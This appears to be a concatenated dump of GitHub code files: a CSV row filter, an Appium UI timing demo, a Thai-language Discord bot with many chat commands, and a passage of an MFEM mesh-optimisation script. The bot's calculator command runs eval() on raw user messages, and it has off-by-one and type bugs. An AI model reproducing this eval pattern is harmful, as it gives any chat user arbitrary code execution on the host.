csv\n\n# Define the input and output file names\ninput_file = 'C:\\\\Users\\\\quchenfu\\\\Downloads\\\\ml-stuttering-events-dataset\\\\SEP-28k_labels_old.csv'\noutput_file = 'C:\\\\Users\\\\quchenfu\\\\Downloads\\\\ml-stuttering-events-dataset\\\\SEP-28k_labels.csv'\n\n# List of strings to remove from the lines\nstrings_to_remove = ['StutteringIsCool', 'StrongVoices']\n\n# Open the input and output CSV files\nwith open(input_file, mode='r', newline='') as infile, open(output_file, mode='w', newline='') as outfile:\n reader = csv.reader(infile)\n writer = csv.writer(outfile)\n\n # Iterate through each row in the input CSV\n for row in reader:\n # Check if any of the strings to remove are in the row\n if not any(s in ' '.join(row) for s in strings_to_remove):\n # If none of the strings are found, write the row to the output CSV\n writer.writerow(row)\n\nprint(f\"Filtered data written to {output_file}\")\n","repo_name":"QuchenFu/stuttering_detection","sub_path":"models/remove.py","file_name":"remove.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"4836112689","text":"from appium import webdriver\nimport time\n\n\ndesired_caps = {\n \"platformName\": \"Android\",\n \"platformVersion\": \"10\",\n \"automationName\": \"UiAutomator2\",\n \"appActivity\": \".MainActivity\",\n \"appPackage\": \"com.example.chapp_poc\",\n \"deviceName\": \"2NSDU20411004107\",\n \"newCommandTimeout\": 7200,\n \"noReset\": True\n}\n\ndriver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)\n\ntime.sleep(2)\n\nstart_time = time.time()\nbtn = driver.find_element_by_xpath(\"//*[contains(@text, '纽崔莱')]\")\nend_time = time.time()\n\nprint(\"cost time is: {}\".format(end_time - start_time))\n\nstart_time = time.time()\nbtn.click()\nend_time = time.time()\n\nprint(\"cost time is: {}\".format(end_time - start_time))\n\n","repo_name":"sayidkongtao/scripts","sub_path":"demo/python_appium_demo_chapp_poc.py","file_name":"python_appium_demo_chapp_poc.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31897523509","text":"import os\nimport math\nimport qrcode\nimport random\nimport asyncio\nimport discord\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# import Discord UI and Constants\nfrom view import *\nfrom constants import *\n\nfrom replit import db\nfrom datetime import datetime\nfrom meme import meme_stealer\nfrom keep_alive import keep_alive\nfrom web_scrapping import find_jobs\nfrom mcv_notify import get_notifications\nfrom apscheduler.triggers.cron import CronTrigger\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\n\n\n# initial data to replit's database\nif \"interact\" not in db.keys():\n db[\"interact\"] = interact\n\nif \"responding\" not in db.keys():\n db[\"responding\"] = True\n\n\n# function to update word in database\ndef add_words(new_word):\n if \"interact\" in db.keys():\n interact = db[\"interact\"]\n interact.append(new_word)\n db[\"interact\"] = interact\n else:\n db[\"interact\"] = [new_word]\n\n\n# function to update word in database\ndef delete_word(index):\n interact = db[\"interact\"]\n\n if index.isdigit():\n if len(interact) > index:\n del interact[index]\n db[\"interact\"] = interact\n\n elif index in interact:\n interact.remove(index)\n db[\"interact\"] = interact\n\n\n# inform daily schedule\nasync def inform():\n await client.wait_until_ready()\n day_of_week = datetime.today().strftime('%A').lower()\n if (day_of_week != \"saturday\") and (day_of_week != \"sunday\"):\n embedVar = discord.Embed(\n title=\"Schedule\",\n url=CP_DOCS,\n description=schedule[day_of_week],\n color=discord.Color.blue()\n )\n embedVar.add_field(\n name=\"Days of week\",\n value=\"For \" + datetime.today().strftime('%A') +\n \" | [MCV](https://www.mycourseville.com/?q=courseville)\" +\n \" [Grader](https://nattee.net/grader)\",\n inline=False\n )\n\n # embedVar.set_author(name=\"\", icon_url=\"\")\n study_room_channel = client.get_channel(808174559529926666)\n Aqioz_id = os.environ['AQIOZ_ID']\n await study_room_channel.send(f\"มาเรียนว้อย {Aqioz_id}\")\n await study_room_channel.send(embed=embedVar)\n\n\n# Class Client\nclass DiscordClient(discord.Client):\n\n # introduce yourself\n async def on_ready(self):\n await client.wait_until_ready()\n await client.change_presence(activity=discord.Game(name=\"$help\"))\n print('We have logged in as {0.user}'.format(client))\n\n # initializing scheduler -> London : timezone=\"Asia/Bangkok\"\n scheduler = AsyncIOScheduler()\n\n # sends inform at 7 AM (Local Time = London)\n scheduler.add_job(inform, CronTrigger(hour=\"0\", minute=\"0\", second=\"1\"))\n scheduler.start()\n\n # react to word and command\n async def on_message(self, message):\n global interact\n msg = message.content\n\n # not reply to itself\n if message.author == client.user:\n return\n\n # responding\n if db[\"responding\"]:\n option = interact\n if \"interact\" in db.keys():\n option = option + list(db[\"interact\"])\n\n if any(word in msg for word in words):\n await message.channel.send(random.choice(option))\n\n # Detected Word\n if msg.startswith('ไป'):\n await message.reply('ไกปู', mention_author=True)\n\n if msg.startswith('สีเหลือง'):\n await message.reply('เยลโล่ว!', mention_author=True)\n\n if msg.lower().startswith('ma'):\n await message.reply('ลุยยยยยยย', mention_author=True)\n\n if msg.lower().startswith('ฝันดี'):\n await message.reply('ฝันดีคับบบ', mention_author=True)\n\n if msg.lower().startswith('เนอะ'):\n await message.reply('อื้อ', mention_author=True)\n\n if 'จิง' in msg:\n await message.channel.send('ฮ้อยย้าา')\n\n # food menu\n if msg.startswith('กินไร'):\n menu = [\"กระเพราหมูสับ\", \"โจ๊กหมูขอฮาๆ\", 'ข้าวไข่เจียว', 'ข้าวไข่ดาว', 'ข้าวไข่ข้น', 'ข้าวไข่ต้ม']\n idx_answer = random.randint(0, len(menu))\n result = menu[idx_answer]\n await message.reply(result, mention_author=True)\n\n # guessing game\n if msg.startswith('$guess'):\n await message.channel.send('ทายเลขใน 1 ถึง 10 ซิ')\n\n def is_correct(m):\n return m.author == message.author and m.content.isdigit()\n\n answer = random.randint(1, 10)\n\n try:\n guess = await self.wait_for('message', check=is_correct, timeout=5.0)\n except asyncio.TimeoutError:\n return await message.channel.send(\n 'ช้าปายย {}.'.format(answer))\n if int(guess.content) == answer:\n await message.channel.send('แม่นน!')\n else:\n await message.channel.send(\n 'ผิด! ตอบ {} โว้ยย'.format(answer))\n\n # anonymus texting command\n if msg.startswith('$send'):\n channel = msg.split(\" \", 2)[1]\n text = msg.split(\" \", 2)[2]\n if (channel == \"general\"):\n general_channel = client.get_channel(694382265081266280)\n await general_channel.send(text)\n elif (channel == \"music\"):\n music_channel = client.get_channel(791315320648368142)\n await music_channel.send(text)\n elif (channel == \"study-room\"):\n study_room_channel = client.get_channel(808174559529926666)\n await study_room_channel.send(text)\n elif (channel == \"gaming\"):\n gaming_chanel = client.get_channel(809839995287633950)\n await gaming_chanel.send(text)\n else:\n test_bot_channel = client.get_channel(928269670635671653) # test channel\n await test_bot_channel.send(text)\n\n # add new words\n if msg.startswith('$add'):\n new_word = msg.split(\"$add\", 1)[1]\n add_words(new_word)\n await message.channel.send(\"เพิ่มละจ้า\")\n\n # delete word in interact\n if msg.startswith(\"$del\"):\n if msg.split(\"$del\", 1)[1] == '':\n interact = list(db[\"interact\"])\n list_of_word = \", \".join(interact)\n await message.channel.send(\"`\" + list_of_word + \"`\")\n return await message.channel.send(interact)\n\n interact = []\n if \"interact\" in db.keys():\n index = int(msg.split(\"$del\", 1)[1])\n delete_word(index)\n interact = list(db[\"interact\"])\n list_of_word = \", \".join(interact)\n await message.channel.send(\"`\" + list_of_word + \"`\")\n else:\n await message.channel.send(\"ว่างแย้วครับพี่\")\n\n # list of word\n if msg.startswith('$list'):\n interact = []\n if \"interact\" in db.keys():\n interact = list(db[\"interact\"])\n list_of_word = \", \".join(interact)\n await message.channel.send(\"`\" + list_of_word + \"`\")\n else:\n await message.channel.send(\"ว่างครับพี่\")\n\n # responding command\n if msg.startswith(\"$responding\"):\n value = msg.split(\"$responding \", 1)[1]\n\n if value.lower() == \"true\":\n db[\"responding\"] = True\n await message.channel.send(\"online now!\")\n else:\n db[\"responding\"] = False\n await message.channel.send(\"offline bye!\")\n\n # Display all commands usage\n if msg.startswith('$help'):\n embed = discord.Embed(\n title=\"How to use commands\",\n url=\"https://discordpy.readthedocs.io/en/stable/\",\n description=\"use prefix $ | Automatically send schedule at 7 am\",\n color=discord.Color.blue()\n )\n\n command_lists = [\n {'name': '$guess', 'usage': 'Guess number from 1-10\\nYou only have 1 guess!'},\n {'name': '$send', 'usage': 'Send anonymous message\\n`send [channel] [text]`'},\n {'name': '$responding', 'usage': 'Toggle interact message\\n`responding [bool]`'},\n {'name': '$list', 'usage': 'Display all interacting words in database'},\n {'name': '$add', 'usage': 'Add word \\n`add [word]`'},\n {'name': '$del', 'usage': 'Delete word\\n`del [index / word]`'},\n {'name': '$random', 'usage': 'Random from list\\n`random [list]`'},\n {'name': '$qrcode', 'usage': 'Create QR-Code\\n`qrcode [data / link]`'},\n {'name': '$poll', 'usage': 'Create poll with reaction\\n`poll [title] [list]`'},\n {'name': '$code', 'usage': 'Create codeblock\\n`code [language]`'},\n {'name': '$cal', 'usage': 'Act as a calculator\\nType `บาย` to quit'},\n {'name': '$base', 'usage': 'Convert number base\\n`base [number] [old_base] [new_base]`'},\n {'name': '$master1', 'usage': 'Master Theorem for dividing function\\n`master1 [a] [b] [d]`'},\n {'name': '$master2', 'usage': 'Master Theorem for decrease function\\n`master2 [a] [b] [k]`'},\n {'name': '$plot', 'usage': 'Plot random points with various size\\n`plot [number]`'},\n {'name': '$inform', 'usage': 'Inform current `author`\\'s schedule'},\n {'name': '$job', 'usage': 'Filter jobs from website\\n`job [keyword] [filter]`'},\n {'name': '$noti', 'usage': 'Notification from MCV\\n`noti [days] [type]`'},\n {'name': '$invite', 'usage': 'Send invitation link'},\n {'name': '$meme', 'usage': 'Random meme go brrrr'},\n {'name': '$join', 'usage': 'join voice channel'},\n ]\n\n # embed.set_thumbnail(url=\"https://i.pinimg.com/originals/13/8d/52/138d52a8f429510e2c16bd67990dae3c.jpg\")\n for command in command_lists:\n embed.add_field(\n name=command['name'],\n value=command['usage'],\n inline=True\n )\n\n # embed.set_author(name=\"Aqioz\")\n Aqioz_id = os.environ['AQIOZ_ID']\n embed.add_field(name=\"__**Author**__\", value=f\"> Bhuribhat@gmail.com\\n> {Aqioz_id}\", inline=False)\n await message.channel.send(embed=embed, view=GithubButton())\n\n # calculator command\n if msg.startswith(\"$cal\"):\n await message.channel.send('ก็มาดิ')\n try:\n equation = await self.wait_for('message', timeout=10.0)\n if equation.content == \"บาย\":\n await message.channel.send(\"บายน้า\")\n except asyncio.TimeoutError:\n return await message.channel.send('ไปละปวดหมอง')\n while equation.content != \"บาย\":\n answer = \"ตอบ \" + str(eval(equation.content))\n await message.channel.send(answer)\n try:\n equation = await self.wait_for('message', timeout=10.0)\n if equation.content == \"บาย\":\n await message.channel.send(\"บายน้า\")\n except asyncio.TimeoutError:\n return await message.channel.send('ไปละปวดหมอง')\n\n # coding template\n if msg.startswith(\"$code\"):\n language = msg.split(\"$code\", 1)[1].strip()\n study_room_channel = client.get_channel(808174559529926666)\n\n if language != '':\n embedVar = discord.Embed(\n title=\"Coding Template\",\n description=f\"` ```{language}\\n`\\t `\\n``` `\",\n color=0x00ff00\n )\n embedVar.add_field(\n name=\"Description\",\n value=f\"Template for {language} language\",\n inline=False\n )\n await study_room_channel.send(embed=embedVar)\n else:\n await study_room_channel.send(view=CodeMenu())\n\n # random list of thing split by comma (\",\")\n if msg.startswith(\"$random\"):\n list_thing = msg.split(\"$random\", 1)[1].split(\",\")\n if (list_thing == ['']):\n result = \"overflow\"\n value = \"None\"\n else:\n result = random.choice(list_thing)\n value = \", \".join(list_thing)\n embedVar = discord.Embed(title=\"Result\", description=f\"`{result.strip()}`\", color=0xe91e63)\n embedVar.add_field(name=\"Randoming from\", value=value, inline=False)\n await message.channel.send(embed=embedVar)\n\n # calculate time complex using master theorem divide function\n if msg.startswith(\"$master1\"):\n coef = msg.split(\"$master1\", 1)[1].split()\n if (len(coef) == 0):\n await message.channel.send(\"__**usage**__: `$master1 a b d`\")\n result = \"Big Thetha\"\n value = \"`T(n) = aT(n/b) + Θ(n^d)`\\n\\n__**Conditions**__:\\na >= 1, b > 1, c = log_b(a), d >= 0, T(0) = 1\"\n else:\n if (len(coef) > 3):\n await message.channel.send(\"*Invalid Input..*\")\n return\n a, b, d = [int(num) for num in coef]\n if a < 1 or b <= 1 or d < 0:\n await message.channel.send(\"*Invalid Input..*\")\n return\n c = math.log(a, b)\n\n # convert to integer if not decimal\n if is_integer_num(a):\n a = math.ceil(a)\n else:\n a = round(a, 2)\n if is_integer_num(b):\n b = math.ceil(b)\n else:\n b = round(b, 2)\n if is_integer_num(c):\n c = math.ceil(c)\n else:\n c = round(c, 2)\n if is_integer_num(d):\n d = math.ceil(d)\n else:\n d = round(d, 2)\n str_c = f\"log_{b}({a})\"\n\n if a == 1:\n a = ''\n if d == 0:\n value = f\" T(n) = {a}T(n/{b}) + 1\"\n elif d == 1:\n value = f\"T(n) = {a}T(n/{b}) + Θ(n)\"\n else:\n value = f\"T(n) = {a}T(n/{b}) + Θ(n^{d})\"\n if d < c:\n await message.channel.send(\"Master theorem case 1 : d < c\")\n if not is_integer_num(c):\n result = f\"Θ(n^{str_c}) = Θ(n^{c})\"\n else:\n if c == 1:\n result = \"Θ(n)\"\n else:\n result = f\"Θ(n^{c})\"\n elif d == c:\n await message.channel.send(\"Master theorem case 2 : d = c\")\n if not is_integer_num(c):\n result = f\"Θ(n^{str_c}log(n)) = Θ(n^{str_c}log(n))\"\n else:\n if c == 0:\n result = \"Θ(log(n)\"\n elif c == 1:\n result = \"Θ(nlog(n)\"\n else:\n result = f\"Θ(n^{c}log(n)\"\n elif d > c:\n await message.channel.send(\"Master theorem case 3 : d > c\")\n if d == 1:\n result = \"Θ(n)\"\n else:\n result = f\"Θ(n^{d})\"\n\n embedVar = discord.Embed(title=\"Divide Function\", description=value, color=0xd69f09)\n embedVar.add_field(name=\"Time Complexity\", value=f\"||`{result.strip()}`||\", inline=False)\n await message.channel.send(embed=embedVar)\n\n # calculate time complex using master theorem decreasing function\n if msg.startswith(\"$master2\"):\n coef = msg.split(\"$master2\", 1)[1].split()\n if (len(coef) == 0):\n await message.channel.send(\"__**usage**__: `$master2 a b k`\")\n result = \"Big Oh Notation\"\n value = \"`T(n) = aT(n - b) + O(n^k)`\\n\\n__**Conditions**__:\\na >= 1, b > 0, k >= 0, T(0) = 1\"\n else:\n if (len(coef) > 3):\n await message.channel.send(\"*Invalid Input..*\")\n return\n a, b, k = [int(num) for num in coef]\n if a < 1 or b <= 0 or k < 0:\n await message.channel.send(\"*Invalid Input..*\")\n return\n\n # convert to integer if it has no decimal, 2 precision otherwise\n if is_integer_num(a):\n a = math.ceil(a)\n else:\n a = round(a, 2)\n if is_integer_num(b):\n b = math.ceil(b)\n else:\n b = round(b, 2)\n if is_integer_num(k):\n k = math.ceil(k)\n else:\n k = round(k, 2)\n\n if a == 1:\n a = ''\n if k == 0:\n value = f\" T(n) = {a}T(n - {b}) + 1\"\n elif k == 1:\n value = f\" T(n) = {a}T(n - {b}) + O(n)\"\n else:\n value = f\" T(n) = {a}T(n - {b}) + O(n^{k})\"\n a = 1 if a == '' else a\n\n if a == 1:\n await message.channel.send(\"Master theorem case 1 : a = 1\")\n if k + 1 > 1:\n result = f\"O(n^{k + 1})\"\n else:\n result = f\"O(n)\"\n\n elif a > 1:\n await message.channel.send(\"Master theorem case 2 : a > 1\")\n if k > 0:\n if k == 1:\n k = \"O(n\"\n else:\n k = f\"O(n^{k}\"\n if b > 1:\n result = f\"{k} * {a}^(n/{b}))\"\n else:\n result = f\"{k} * {a}^n)\"\n else:\n if b > 1:\n result = f\"O({a}^(n/{b}))\"\n else:\n result = f\"O({a}^n)\"\n\n embedVar = discord.Embed(title=\"Decrease Function\", description=value, color=0xd69f09)\n embedVar.add_field(name=\"Time Complexity\", value=f\"||`{result.strip()}`||\", inline=False)\n await message.channel.send(embed=embedVar)\n\n # inform\n if msg.startswith(\"$inform\"):\n day_of_week = datetime.today().strftime('%A').lower()\n if (day_of_week != \"saturday\") and (day_of_week != \"sunday\"):\n embedVar = discord.Embed(\n title=\"Schedule\",\n url=\"https://docs.google.com/document/d/1C1sF4aS6kFjqWBtU91vSYUvTSxdh9xxXhA9LeUUTbXg/edit#heading=h.8sb6c0hcl62a\",\n description=schedule[day_of_week],\n color=discord.Color.blue())\n embedVar.add_field(\n name=\"Days of week\",\n value=\"For \" + datetime.today().strftime('%A') +\n \" | [MCV](https://www.mycourseville.com/?q=courseville)\" +\n \" [Grader](https://nattee.net/grader)\",\n inline=False)\n await message.channel.send(embed=embedVar)\n\n # plot graph within 10,000 number\n if msg.startswith(\"$plot\"):\n number = int(msg.split(\"$plot \", 1)[1])\n if (number >= 1000):\n await message.channel.send(\"too much bro\")\n else:\n data = {\n 'a': np.arange(number),\n 'c': np.random.randint(0, number, number),\n 'd': np.random.randn(number)\n }\n data['b'] = data['a'] + 10 * np.random.randn(number)\n data['d'] = np.abs(data['d']) * 100\n\n # Set background color and axis\n plt.figure(figsize=(10, 6), facecolor=\"#303340\")\n ax = plt.axes()\n ax.set_facecolor(\"#303340\")\n ax.tick_params(axis=\"x\", color=\"white\")\n ax.tick_params(axis=\"y\", color=\"white\")\n plt.xticks(color=\"white\")\n plt.yticks(color=\"white\")\n\n # plot graph\n plt.scatter('a', 'b', c='c', s='d', data=data)\n plt.xlabel('Data', color=\"cyan\")\n plt.ylabel('Value', color=\"cyan\")\n plt.title(r'$\\Sigma=$' + str(number), color=\"orange\")\n\n await message.channel.send(f\"min data = {getMinPoint(data)}\")\n await message.channel.send(f\"max data = {getMaxPoint(data)}\")\n\n # send graph to channel\n plt.savefig('.\\\\assets\\\\graph.png', bbox_inches='tight')\n await message.channel.send(file=discord.File('.\\\\assets\\\\graph.png'))\n\n # QR-Code PNG\n if msg.startswith(\"$qrcode\"):\n QR = qrcode.QRCode(version=1, box_size=10, border=2)\n data = msg.split(\"$qrcode \", 1)[1]\n QR.add_data(data)\n QR.make(fit=True)\n\n # fill_color='black', back_color='white'\n img = QR.make_image()\n img.save('.\\\\assets\\\\QRCode.png')\n\n # send picture to channel\n await message.channel.send(file=discord.File('.\\\\assets\\\\QRCode.png'))\n\n if msg.startswith(\"$base\"):\n attr = msg.split(\"$base\", 1)[1].split()\n if (len(attr) == 0):\n await message.channel.send(\"__**usage**__: `$base number base convert_base`\")\n result = \"Number in base X\"\n value = \"base >= 2\"\n base = 'n'\n convert_base = 'x'\n else:\n if (len(attr) > 3):\n await message.channel.send(\"*Invalid Input..*\")\n return\n number, base, convert_base = [int(num) for num in attr]\n result = numberAnyBase(number, base, convert_base)\n value = number\n\n embedVar = discord.Embed(title=\"From base \" + str(base), description=value, color=0xa84300)\n embedVar.add_field(name=\"Convert to base \" + str(convert_base), value=f\"||`{result.strip()}`||\", inline=False)\n await message.channel.send(embed=embedVar)\n\n # jobs seeker with csv file\n if msg.startswith(\"$job\"):\n attr = msg.split(\"$job\", 1)[1].split()\n if (len(attr) == 0):\n await message.channel.send(\"__**usage**__: `$job keyword unwanted_skill`\")\n return\n else:\n if (len(attr) > 2):\n await message.channel.send(\"*Invalid Input..*\")\n return\n\n keyword, unwant_skill = attr\n df = find_jobs(keyword, unwant_skill)\n df = df.drop(['Job Description', 'More Information', 'Skills Required'], axis=1)\n \n length = df.shape[0]\n df = df.head(5).to_string()\n\n embedVar = discord.Embed(title=f\"All Jobs with {keyword} skill\", description=f\"filter out {unwant_skill}\", color=0xa84300)\n embedVar.add_field(name=f\"Found {length} jobs\", value=f\"```{df}```\", inline=False)\n await message.channel.send(embed=embedVar)\n await message.channel.send(\"for more detail please check `csv file`\")\n await message.channel.send(file=discord.File(\".\\\\assets\\\\jobs.csv\"))\n\n # poll with reactions\n if msg.startswith(\"$poll\"):\n emoji = ['1️⃣','2️⃣','3️⃣','4️⃣','5️⃣','6️⃣','7️⃣','8️⃣','9️⃣']\n choices = msg.split(\"$poll\")[1].split()\n if (len(choices) == 0):\n await message.channel.send(\"__**usage**__: `$poll title `\")\n return\n if (len(choices) > len(emoji) + 1):\n await message.channel.send(\"too much bro\")\n return\n\n title = choices[0]\n display_choices = ''\n for i in range(len(choices[1:])):\n display_choices += f\"{emoji[i]} {choices[1:][i]}\\n\"\n embedVar = discord.Embed(title=f\"Please vote!\", color=0x64395d)\n embedVar.add_field(name=title, value=f\"```{display_choices}```\", inline=False)\n pollmsg = await message.channel.send(embed=embedVar)\n\n for i in range(len(choices[1:])):\n await pollmsg.add_reaction(emoji[i])\n\n # get mcv notifications\n if msg.startswith(\"$noti\"):\n attr = msg.split(\"$noti\")[1].split()\n if len(attr) > 2:\n await message.channel.send(\"__**usage**__: `$noti days type`\")\n await message.channel.send(\"type must be between `Assignment, Material, Announcement`\")\n return\n\n if len(attr) == 0:\n await message.channel.send(\"ํYou can select up to 2 filters!\")\n await message.channel.send(view=NotiMenu())\n return\n elif len(attr) == 1:\n if attr[0].isnumeric():\n notifications = get_notifications(days=attr[0])\n elif attr[0].title() in ['Assignment', 'Material', 'Announcement']:\n notifications = get_notifications(select=attr[0])\n else:\n await message.channel.send(\"type must be between `Assignment, Material, Announcement`\")\n return\n else:\n notifications = get_notifications(attr[0], attr[1])\n \n embedVar = discord.Embed(title=\"MCV Notification\", color=discord.Color.blue())\n for notification in notifications:\n value = f\"```{notification[1]}```{notification[2]}\"\n embedVar.add_field(name=notification[0], value=value, inline=False)\n await message.channel.send(embed=embedVar)\n\n # send meme\n if msg.startswith(\"$meme\"):\n meme_stealer()\n await message.channel.send(file=discord.File('.\\\\assets\\\\meme.png'))\n\n # send invitation\n if msg.startswith(\"$invite\"):\n inv = await message.channel.create_invite()\n await message.channel.send(\"Click the button below to invite someone!\", view=InviteButton(str(inv)))\n\n # join voice channel\n if msg.startswith(\"$join\"):\n channel = message.author.voice.channel\n await channel.connect()\n\n\nif __name__ == '__main__':\n intents = discord.Intents.default()\n intents.message_content = True\n\n # driver code\n client = DiscordClient(intents=intents)\n keep_alive()\n client.run(TOKEN)\n","repo_name":"Bhuribhat/Discord-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30687833282","text":"#\n# based on meshOptMWE.cpp from Ketan Mittal\n#\n# python test_tmop.py -m ../data/square01.mesh -o 2 -rs 2 -mid 80 -tid 5 -ni 50 -qo 4 -vl 2 -ae 0\nimport sys\nimport os\nfrom os.path import expanduser, join\nimport numpy as np\n\nif len(sys.argv) > 1 and sys.argv[1] == '-p':\n import mfem.par as mfem\n use_parallel = True\n from mfem.common.mpi_debug import nicePrint as print\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n sys.argv = [sys.argv[0]] + sys.argv[2:]\n\nelse:\n import mfem.ser as mfem\n use_parallel = False\n myid = 0\n\nclass discrete_size_2d(mfem.PyCoefficient):\n def EvalValue(self, x):\n opt = 2;\n small = 0.001\n big = 0.01\n val = 0.;\n \n xc = x[0] - 0.0\n yc = x[1] - 0.5\n r = np.sqrt(xc*xc + yc*yc)\n r1 = 0.45\n r2 = 0.55\n sf=30.0\n val = 0.5*(1+np.tanh(sf*(r-r1))) - 0.5*(1+np.tanh(sf*(r-r2)))\n\n val = max(0.,val)\n val = min(1.,val)\n\n return val * small + (1.0 - val) * big\n \ndef run(args):\n mesh_file = expanduser(\n join(os.path.dirname(__file__), '..', 'data', args.mesh))\n\n mesh_poly_deg = args.order\n rs_levels = args.refine_serial\n metric_id = args.metric_id\n target_id = args.target_id\n quad_type = args.quad_type\n quad_order = args.quad_order\n solver_type = args.solver_type\n lin_solver = args.lin_solver\n normalization = args.normalization\n\n verbosity_level = args.verbosity_level\n \n n_hr_iter=args.n_hr_iter\n n_h_iter=args.n_h_iter\n \n solver_iter = args.newton_iters\n solver_rtol= args.newton_rel_tolerance\n solver_art_type = args.adaptive_rel_tol\n max_lin_iter = args.lin_iter\n hradaptivity = args.hr_adaptivity\n visualization = not args.no_visualization\n adapt_eval= args.adaptivity_evaluator\n\n devopt = \"cpu\";\n\n # 2. Initialize and refine the starting mesh.\n mesh = mfem.Mesh(mesh_file, 1, 1, False)\n for i in range(rs_levels):\n mesh.UniformRefinement()\n dim = mesh.Dimension();\n\n fec = mfem.H1_FECollection(mesh_poly_deg, dim)\n fespace = mfem.FiniteElementSpace(mesh, fec, dim)\n\n mesh.SetNodalFESpace(fespace)\n\n b = mfem.Vector(0)\n\n x = mfem.GridFunction(fespace)\n mesh.SetNodalGridFunction(x)\n x.SetTrueVector()\n x.SetFromTrueVector()\n \n # 9. Save the starting (prior to the optimization) mesh to a file. This\n # output can be viewed later using GLVis: \"glvis -m perturbed.mesh\".\n mesh.Print(\"perturbed.mesh\")\n\n # 10. Store the starting (prior to the optimization) positions.\n x0 = mfem.GridFunction(fespace)\n x0.Assign(x)\n\n metric = mfem.tmop.TMOP_Metric_080(0.5)\n\n ind_fec = mfem.H1_FECollection(mesh_poly_deg, dim)\n ind_fes = mfem.FiniteElementSpace(mesh, ind_fec)\n size = mfem.GridFunction(ind_fes)\n\n \n if target_id == 5: # Discrete size 2D or 3D\n target_t = mfem.tmop.TargetConstructor.IDEAL_SHAPE_GIVEN_SIZE\n \n tc = mfem.tmop.DiscreteAdaptTC(target_t)\n \n if adapt_eval == 0:\n tc.SetAdaptivityEvaluator(mfem.tmop.AdvectorCG())\n else:\n if \"InterpolatorFP\" in dir(mfem.tmop):\n evaluator = mfem.tmop.InterpolatorFP()\n tc.SetAdaptivityEvaluator(evaluator)\n else:\n assert False, \"MFEM is not built with GSLIB.\"\n if dim == 2:\n #size_coeff = mfem.FunctionCoefficient(discrete_size_2d)\n size_coeff = discrete_size_2d()\n size.ProjectCoefficient(size_coeff)\n else:\n assert False, \"only dim == 2 supported for this MWE.\"\n \n tc.SetSerialDiscreteTargetSize(size)\n target_c = tc;\n\n else:\n print(\"Unknown target_id: \" + str(target_id))\n return\n\n if target_c is None:\n target_c = mfem.tmop.TargetConstructor(target_t);\n\n target_c.SetNodes(x0)\n \n tmop_integ = mfem.tmop.TMOP_Integrator(metric, target_c)\n \n # Setup the quadrature rules for the TMOP integrator.\n if quad_type == 1:\n irules = mfem.IntegrationRules(0, mfem.Quadrature1D.GaussLobatto)\n elif quad_type == 2: \n irules = mfem.IntRules\n elif quad_type == 3: \n irules = mfem.IntegrationRules(0, mfem.Quadrature1D.ClosedUniform)\n else:\n print( \"Unknown quad_type: \" + str(quad_type))\n return 3\n\n tmop_integ.SetIntegrationRules(irules, quad_order)\n\n if normalization:\n tmop_integ.EnableNormalization(x0)\n\n a = mfem.NonlinearForm(fespace)\n a.AddDomainIntegrator(tmop_integ)\n\n # For HR tests, the energy is normalized by the number of elements.\n init_energy = a.GetGridFunctionEnergy(x);\n \n # Visualize the starting mesh and metric values.\n # Note that for combinations of metrics, this only shows the first metric.\n if visualization:\n mfem.tmop.vis_tmop_metric_s(mesh_poly_deg, metric, target_c, mesh, \"Initial metric values\", 0);\n\n # 13. Fix all boundary nodes, or fix only a given component depending on the\n # boundary attributes of the given mesh. Attributes 1/2/3 correspond to\n # fixed x/y/z components of the node. Attribute 4 corresponds to an\n # entirely fixed node. Other boundary attributes do not affect the node\n # movement boundary conditions.\n ess_bdr = mfem.intArray([1]*mesh.bdr_attributes.Max())\n a.SetEssentialBC(ess_bdr);\n\n\n # 14. As we use the Newton method to solve the resulting nonlinear system,\n # here we setup the linear solver for the system's Jacobian.\n linsol_rtol = 1e-12;\n if lin_solver == 0:\n S = mfem.DSmoother(1, 1.0, max_lin_iter)\n elif lin_solver == 1:\n cg = mfem.CGSolver()\n cg.SetMaxIter(max_lin_iter)\n cg.SetRelTol(linsol_rtol)\n cg.SetAbsTol(0.0)\n cg.SetPrintLevel(3 if verbosity_level >= 2 else -1)\n S = cg\n else:\n minres = mfem.MINRESSolver()\n minres.SetMaxIter(max_lin_iter)\n minres.SetRelTol(linsol_rtol)\n minres.SetAbsTol(0.0)\n if verbosity_level > 2:\n minres.SetPrintLevel(1)\n minres.SetPrintLevel(3 if verbosity_level == 2 else -1)\n if lin_solver == 3 or lin_solver == 4:\n ds = mfem.DSmoother((0 if lin_solver == 3 else 1), 1.0, 1)\n ds.SetPositiveDiagonal(True)\n minres.SetPreconditioner(ds)\n S = minres;\n \n #/ Perform the nonlinear optimization.\n ir = irules.Get(fespace.GetFE(0).GetGeomType(), quad_order)\n solver = mfem.tmop.TMOPNewtonSolver(ir, solver_type)\n solver.SetIntegrationRules(irules, quad_order)\n if solver_type == 0:\n # Specify linear solver when we use a Newton-based solver.\n solver.SetPreconditioner(S)\n\n print(dir(solver))\n solver.SetMaxIter(solver_iter)\n solver.SetRelTol(solver_rtol)\n solver.SetAbsTol(0.0)\n if solver_art_type > 0:\n solver.SetAdaptiveLinRtol(solver_art_type, 0.5, 0.9)\n\n solver.SetPrintLevel(1 if verbosity_level >= 1 else -1)\n\n hr_solver = mfem.tmop.TMOPHRSolver(mesh, a, solver, x, False, hradaptivity,\n mesh_poly_deg, metric_id, n_hr_iter, n_h_iter)\n hr_solver.AddGridFunctionForUpdate(x0)\n hr_solver.Mult()\n\n # 15. Save the optimized mesh to a file. This output can be viewed later\n # using GLVis: \"glvis -m optimized.mesh\".\n mesh.Print(\"optimized.mesh\", 14)\n\n fin_energy = a.GetGridFunctionEnergy(x)\n print(\"Initial strain energy: \" + \"{:g}\".format(init_energy))\n print(\" Final strain energy: \" + \"{:g}\".format(fin_energy))\n print(\"The strain energy decreased by: \" + \n \"{:g}\".format((init_energy - fin_energy) * 100.0 / init_energy))\n\n # 16. Visualize the final mesh and metric values.\n if visualization:\n 